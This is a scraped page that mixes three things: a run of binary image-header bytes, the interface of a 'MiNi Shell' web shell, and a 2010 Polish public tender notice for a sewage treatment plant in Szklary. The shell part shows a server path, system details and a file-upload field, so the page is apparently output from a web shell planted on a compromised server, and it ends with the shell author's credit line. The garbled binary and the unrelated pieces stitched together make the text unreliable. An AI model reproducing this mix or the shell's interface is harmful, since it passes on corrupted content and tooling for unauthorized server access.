JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100812/247772-N-2010.html

<p class="kh_header"><b>Dukla: BUDOWA OCZYSZCZALNI ŚCIEKÓW DLA OSIEDLA IGLOOPOL W SZKLARACH</b><br>
<b>Numer ogłoszenia: 247772 - 2010; data zamieszczenia: 12.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jaśliska , Ul. Trakt Wegierski 11, 38-450 Dukla, woj. podkarpackie, tel. 13 432 91 00, faks 13 433 10 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jasliska.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA OCZYSZCZALNI ŚCIEKÓW DLA OSIEDLA IGLOOPOL W SZKLARACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Roboty ziemne i przygotowawcze
1.1.	Rozebranie nawierzchni z płyt drogowych betonowych gr. 15 cm (30 m2 )
1.2.	Analogia- ułożenie nawierzchni z wcześniej rozebranych płyt drogowych (30m2)
1.3.	Demontaż starej oczyszczalni typu KOS-2 i wywóz na złom (1 kpl)
1.4.	Wykopy jamiste o głęb. Do 3.0 m wyk. na odkład koparkami podsiębiernymi o poj. Łyżki 0.15 - 0.25 m3 w gr. kat. III (wykop pod kanał ścieków surowych, ścieków oczyszczonych i połączeń między obiektowych) (169.950 m3)
1.5.	Wykopy liniowe szer. 0.8- 2.5 m o głęb. Do 1.5 m o ścianach pion. z ręcznym wydob. urobku w gruntach suchych kat. III- IV (10.800 m3)
1.6.	Wykopy oraz przekopy o głęb. do 3.0 m wyk. na odkład koparkami podsiębiernymi o poj. Łyżki 0.25- 0.60 m 3 w gr. kat. III- IV ( wykopy pod studnie kanalizacyjne)      (63. 906 m3 )  
1.7.	Wykopy oraz przekopy o głęb. do 3.0 m wyk. na odkład koparkami podsiębiernymi o poj. łyżki 0.25 - 0.60 m3 w gr. kat. III-IV (wykop pod przepompowanie ścieków surowych - w miejscu starej oczyszczalni) (1.243 m3)
1.8.	Wykopy oraz przekopy o głęb. do 3.0 wyk. na odkład koparkami podsiębiernymi o poj. łyzki 0.25 - 0.60 m3 w gr. kat. III-IV (wykop pod zbiornik osadu nadmiernego) (21.372 m3)
1.9.	Wykopy oraz przekopy głęb. do 3.0 wyk. na odkład koparkami podsiębiernymi o poj. łyzki 0.25 - 0.60 m3 w gr. kat. III-IV (wykop pod oczyszczalnię ścieków) (115.940 m3)
1.10.	Kanały rurowe - podłoża wykonywane metodą stabilizacji cementem o gr. 15cm - podłoże pod podłoża betonowe pod oczyszczalnię, zbiornik osadu i przepompowanie ścieków) (32.317 m2)
1.11.	Podłoża betonowe o grubości 20 cm - pod oczyszczalnię (4.525 m3)
1.12.	Podłoża betonowe o grubości 20 cm - pod zbiornik osadu nadmiernego (0.904 m3)
1.13.	Podłoża betonowe o grubości 20 cm - pod przepompowanie ścieków (0.307 m3)
1.14.	Podłoża betonowe o grubości 15 cm - pod pojemniki na skratki (0.164 m3)
1.15.	Układanie mieszanki betonowej - ściany proste i łukowe obetonowanie ścian reaktora (20.016 m3)
1.16.	Kanały rurowe - podłoża wykonywane metodą stabilizacji cementem o gr. 14 cm - Osypka mieszanka piasku i cementu wokół zbiornika osadu nadmiernego nadmiernego pompowni ścieków (11.917 m2)
1.17.	Kanały rurowe - podłoża z materiałów sypkich sypkich o gr. 20 cm - osypka rur (44.400 m2)
1.18.	Wykonanie wylotu ścieków oczyszczonych (0.350 m3)
1.19.	Umocnienie skarp i dna rowów pytami betonowymi typu IOMB na podsypce cementowo-piaskowej (9.600 m2)
1.20.	Analogia - Umocnienie skarp kratami koszowo kamiennymi (32.000 m2)
1.21.	Analogia - wykonanie wcinki w istniejącą kanalizację (rury PVC 200) (1.000 msc.)
1.22.	Likwidacja starego betonowego zbiornika uśredniającego ścieki o średnicy 5m i wys. 2,9m-zasypanie ziemi z nadmiaru wykopów, oraz likwidacja starego odcinka 20m kanalizacji. (1.000 kpl)
1.23.	Formowanie i zagęszczanie nasypów o wys. Do 30 m spycharkami spycharkami w gruncie kat. III-IV(formownie brzegu potoku i nasyp wokół zbiornika oczyszczalni) (48.750 m3)
1.24.	Zasypanie wykop. fund. podłużnych, punktowych, rowów, wykopów obiektowych spycharkami z zagęszcz. mechanicznym spycharkami (gr. warstwy w stanie luźnym 30 cm) - kat.gr. III-IV (268.068 m3)
1.25.	Mechaniczne plantowanie powierzchni gruntu rodzimego grunt kat.I-III (66.396 m2)
2.	Roboty montażowe
2.1.	Dostawa i montaż kompletnej oczyszczalni ścieków o przepustowości 30m3/d (1.000 kpl)
2.2.	Dostawa i montaż przepompowani ścieków (1.000 kpl)
2.3.	Dostawa i montaż zbiornika osadu nadmiernego (1.000 kpl)
2.4.	Pojemnik na skratki (1.000 kpl)
2.5.	Studnie rewizyjne z kręgów betonowych i żelbetonowych żelbetonowych śr. 1200 mm wykonywane metodą studniarską w gruncie kat.III - głębokości 3m - 6 kręgów betonowych wys. 500 mm na studnie (3.000 stud.)
2.6.	Studnie rewizyjne z kręgów betonowych i żelbetonowych żelbetonowych śr. 1200 mm wykonywane metodą studniarską w gruncie kat.III - głębokości 2m - 4 kręgi wys. 500 mm na studnie (3.000 stud.)
2.7.	Studnie rewizyjne z kręgów betonowych i żelbetonowych żelbetonowych śr. 1200 mm wykonywane metodą studniarską w gruncie kat.III - głębokości 1m - 2 kręgi na studnie (1.000 stud.)
2.8.	Płyty żelbetonowe przejściowe na studniach o śr.1400/600 mm z włazem żeliwnym fi 600 (7.000 kpl.)
2.9.	Studzienki kanalizacyjne systemowe o śr315 mm - zamkniecie rurą teleskopową (1.000 szt)
2.10.	Urządzenie do pomiaru ścieków zamontowane w studzience SO1 (1.000 kpl)
2.11.	Rurociągi z polichlorku winylu (PCW) o śr. zewn. 225 mm (142.000 m)
2.12.	Rurociągi z PCW o śr. 110 mm łącznie z metodą wciskową (19.000 m)
2.13.	Rurociągi z tworzyw sztucznych (PP,PE,PB) o śr. zewnętrznej 50 mm o połączeniach zgrzewanych (6.500 m)
3.	Roboty wykończeniowe
3.1.	Wrota z furtka wys.1.65m szer. wrót 3m i furtki 1 m z siatki w rmach stal. na got. Słupkach (1.000 kpl.)
3.2.	Schody żelbetonowe, proste na płycie gr. 8 cm (3.200 m2)
3.3.	Nawierzchnie z kostki brukowej betonowej grup. 6 cm na podsypce cementowo-piaskowej (chodnik wokół oczyszczalni szerokości 0,6m) (14.800 m2)
3.4.	Podsypka piaskowa z zagęszczeniem ręcznym - 3 cm grub. warstwy po zagęszcz. (14.800 m2)
3.5.	Rowki pod krawężniki w gruncie kat.III-IV (22.500 m)
3.6.	Krawężniki betonowe wystające o wymiarach 15x30 cm bez ław na podsypce cementowo-piaskowej (22.500 m)
4.	Roboty elektryczne
4.1.	Likwidacja istniejącej instalacji elektrycznej (1.000 kpl)
4.2.	Kopanie rowów dla kabli w sposób ręczny w gruncie kat. IV (11.200 m3)
4.3.	Nasypanie warstwy piasku na dnie rowu kablowego o szerokości do 0.4 m (38.000 m)
4.4.	Układanie kabli o masie do 1.0 kg/m w rowach kablowych ręcznie (52.000 m)
4.5.	Zasypywanie rowów dla kabli wykonanych ręcznie w gruncie kat. IV (9.800 m3)
4.6.	Zarobienie na sucho końca kabla 5-zyłowego o przekroju żył do 16 mm2 na napięcie do 1kV o izolacji i powłoce powłoce tworzyw sztucznych (1.000 szt.)
4.7.	Skrzynka sterownicza ( przy oczyszczalni) (1.000 szt.)
4.8.	Przedzwonienie przewodów (1.000 szt.)
4.9.	Sprawdzanie samoczynnego wyłączania zasilania (pierwsza próba) (1.000 prób.)
4.10.	Badania i pomiary instalacji skuteczności zerowania (pierwszy pomiar) (1.000 szt.)
5.	Wytyczenie i inwentaryzacja
5.1.	Wytyczenie i inwentaryzacja (1.000 szt).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.22.00-0, 45.33.20.00-3, 45.10.00.00-8, 45.23.32.22-1, 45.23.24.21-9, 45.11.12.00-0, 45.23.24.23-3, 45.23.24.00-6, 45.23.13.00-8, 45.25.56.00-5, 44.13.00.00-0, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg załącznika nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg załącznika nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg załącznika nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg załącznika nr 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg załącznika nr 2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jasliska.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WWW.JASLISKA.INFO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 08:15, miejsce: URZĄD GMINY JAŚLISKA
JAŚLISKA 171
38-485 JAŚLISKA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com